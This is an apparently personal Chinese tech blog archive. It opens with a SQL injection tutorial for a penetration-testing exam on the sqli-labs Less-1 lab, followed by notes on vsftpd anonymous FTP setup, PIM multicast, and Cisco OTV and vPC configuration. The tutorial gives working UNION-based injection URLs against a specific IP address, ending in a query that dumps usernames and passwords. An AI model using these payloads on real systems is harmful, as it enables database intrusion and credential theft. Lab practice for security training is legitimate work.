Fantasy - Fantasy
作者归档

PTE-SQL注入

2023年10月8日
{ 没有评论 }

第一章 SQL注入

1、找寻注入点

2、判断注入类型

a.数字型 b.字符型

http://49.235.78.245:1111/Less-1/?id=1 and 1=1

http://49.235.78.245:1111/Less-1/?id=1 and 1=2

看看是否正常,如果都正常,说明a—nd后面的1=1,1=2没有生效。说明是字符型注入,有闭合。

3、判断闭合方式

字符型注入闭合方式:‘ ” ) ‘) “) % %)

注释方法: %23 –+ # %00

http://49.235.78.245:1111/Less-1/?id=1 and 1=1 %23 #显示查询结果

http://49.235.78.245:1111/Less-1/?id=1 and 1=2 %23 #不显示查询结果

说明闭合方式为 : ‘

4、判断列数 (order by

order by 排序函数 参数大于实际列数时,会报错。 以此来判断列数

http://49.235.78.245:1111/Less-1/?id=1′ order by 3 %23

5、联合查询 union selcet

http://49.235.78.245:1111/Less-1/?id=-1′ union select 1,2,3 %23

http://49.235.78.245:1111/Less-1/?id=-1′ union select 1,database(),version() %23

通过显示情况判断回显位置。

MySQL 常用表

information_schema.schemata #存储数据库中所有数据库的库名

information_schema.tables #存储数据库中所有数据表的表名

information_schema.columns #存储数据库中所有列的列名

常用字段

table_schema #数据库名称

table_name #数据表名称

column_name #列名称

依次查询:

查询所有库名

http://49.235.78.245:1111/Less-1/?id=-1′ union select 1,group_concat(schema_name),3 from information_schema.schemata %23

查询所有表名

http://49.235.78.245:1111/Less-1/?id=-1′ union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=’security’ %23

查询列名称

http://49.235.78.245:1111/Less-1/?id=-1′ union select 1,group_concat(column_name),3 from information_schema.columns where table_name=”users” %23

查询结果

http://49.235.78.245:1111/Less-1/?id=-2′ union select 1,group_concat(“@”, id,”:”,username,”:”,password,”@”),3 from users %23

阅读更多…
生活琐事

CentOS7 的FTP服务器配置

2019年2月19日
{ 没有评论 }
一、安装vsftpd及ftp命令
yum install vsftpd -y
yum install ftp -y
 
二、vsftpd服务器的配置文件
 
实现在开启防火墙和SELinux情况下,实现匿名用户的登录,可以上传下载,可以创建目录,创建权限掩码为022,可以删除文件,最大上传速度为100kbit/s。
 
vsftpd服务器的主要配置文件是/etc/vsftpd/vsftpd.conf。
1.服务器端设置
 
1.1修改配置文件开放匿名用户上传、下载及其他权限,
 
anonymous_enable=yes //允许匿名用户登录
 
anon_upload_enable=yes //允许匿名用户上传
 
write_enable=yes //赋予写权限
 
anon_mkdir_write_enable=yes //允许匿名用户新建文件夹
 
anon_other_write_enable=yes //匿名用户拥有除了上传和新建目录之外的其他权限
 
anon_amask=022 //匿名用户的权限掩码
 
anon_max_rate=102400 //最大上传速度100kbit/s
 
 
然后重启服务
 
systemctl restart vsftpd.service
 

阅读更多…

Linux

组播回忆小记

2017年12月18日
{ 没有评论 }

PIM有两个版本,一个spase mode 一个dense mode,主要的区别是在转发组播流量行为上,dense mode前提假设网络上(pim 区域)所有设备都是组播源的接收者,除非特别指明不接收。spase mode 前提假设你不想接收转发组播除非你特别告诉想接收组播流。

PIM dense mode是相当简单直接的转发方式,但是也相当浪费网络资源

PIM spase mode 主要核心概念是RP汇聚点,组播源就是树的根。但是如何让PIM区域里的路由器转发默认没有配置转发的组播流量,一个接收者可能说我想加入组播组239.1.1.1,但是如何让离接收者最近的路由器(也就是最后一跳路由器)知道往哪里发送 PIM JOIN msgs(就是告诉上游路由器它想开始接收这个组的组播流),再上一跳的路由器在把PIM Join msg发到哪。RP就是解决这个问题。所有的路由器表明它们想加入的特定组播组到RP,以及所有的流量源首先转发流量到RP,以至于让RP来转发后续的流量,这就是一个共享树

共享树(*,G)VS最短路径树(S,G)

2.SSM 指定源组播
使用IGMPv3    它的报文里指定了源ip
不建立(*,G) 表项,不需要RP
地址段 232.0.0.0/8作为SSM组播范围  

3.BIDir双向PIM
Bi-Dir 在从源端到RP之间路径上的路由器中,选择一个“指定转发器”(选择原则:到RP最优)

cisco技术

CCIE-DC学习笔记4–OTV

2017年7月14日
{ 没有评论 }

交换机只有N7K支持 OTV ,路由器CSR也支持OTV

edge设备
每一个site最多2个edge设备

internal interfaces 内部接口 二层trunk

join interface 接入外网 IP 只有一个

overlay interface 逻辑接口 封装,解封装

原则与限制
1.OTV边界设备上 不能创建扩展VLAN的SVI
2.为一个overlayinterface只能指派一个join interface
3.同一个站点多个overlay interface可以共享一个site-vlan

OTV control Plane
邻居建立取决于广域网能力
1.支持组播 加入统一组播组
2.不支持组播 需要一个或者多个边界设备做比邻服务器

OTV二层故障域
1.站点间生成树隔离 BPDU不会通过overlay interface转发
不知道目的地的单播流量隔离
边界设备做ARP代理

AED 授权边界设备
在有2个OTV边界设备时,每个VLAN只由一个边界设备转发
基于HASH函数选择VLAN

OTV配置
feature otv
interface overlay0
descripticon West Site
otv join-interface E1/1
otv control-group 239.1.1.1
otv data-group 232.192.1.0/24 站点内组播流量
otv extend-vlan 100-150

otv site-vlan 99
otv site identifier 0x1 (OTV站点标示,同一站点内标示一致)

show otv vlan
show otv route

骨干网不支持组播情况下的OTV:
需要OTV adjacency 服务器

主用adjacency server 配置
interface overlay0
descripticon West Site
otv join-interface E1/1
otv extend-vlan 100-150
otv adjacency-server unicast only

备用adjacency server配置
interface overlay0
otv adjacency-server unicast only
otv use-adjacency-server x.x.x.x unicast only

使用备用adjacency server配置
interface overlay0
otv adjacency-server unicast only
otv use-adjacency-server x.x.x.x(主用) x.x.x.x(备用)unicast only

show otv adjacency

OTV新特性
一、环回口做join interface
join interface 只能用一个 ,出口有2个的时候,可以用环回口,防止单一接口DOWN

二、Authentication
1.数据层面认证(认证不通过,可以建邻居,发不了数据)
key chain OTVkeys
key 1
key-string 0 cisco

interface overlay1
otv isis authentication md5
otv isis authentication key-chain OTVkeys

2.控制层面认证(认证不通过建不了邻居)

otv-isis default
vpn overlay1
authentication-check
authentication-type md5
authentication key-chain OTVkeys

三、OTV VLAN Translation
解决两数据中心的两端VLAN号不一致
DC1 vlan 100—— DC2 vlan 200

只需要在DC1配置一条命令:
interface overlay0
otv vlan mapping 203 to 303

show otv vlan-mapping

cisco技术

CCIE-DC学习笔记3–VPC

2017年7月14日
{ 没有评论 }

配置vPC
1.激活特性
feature vpc
feature lacp

2.配置domain
vpc domain 73
role priority 73 (小的为主)
system-priority 2500

3.配置peer-keepalive (三层路由链路,承载心跳,进行双active检测)

peer-leepalive destination x.x.x.x source x.x.x.x

4.配置peer-link(直连,二层,承载控制层面流量,两端的板卡类型要一致。10Ge only)

interface e3/1-2
channel-group 20 mode ative
no shut

interface port-channel 20
switchport mode trunk
vpc peer-link

5.上联两台设备配置port-channel
feature lacp

interface e3/4
channel-group 30 mode active
no shut

interface port-channel 30
switchport mode trunk
vpc 30

6.下联一台设备配置port-channel

interface e3/1-2
channel-group 30 mode active

interface port-channel 30
switchport mode trunk

7.检查
show vpc

show vpc consistency-parameters interface port-channel 30
type 1 必须一致 ,type 2 可以不一致

vPC中HRSP行为是被修改的,所有HSRP路由器都会主动转发收到的流量

vPC Peer Switch特性 两台设备模拟一个MAC发BPDU

vPC二层技术

cisco技术
上一页
watch glee episodes joomla themes Wordpress主题站 templates2joomla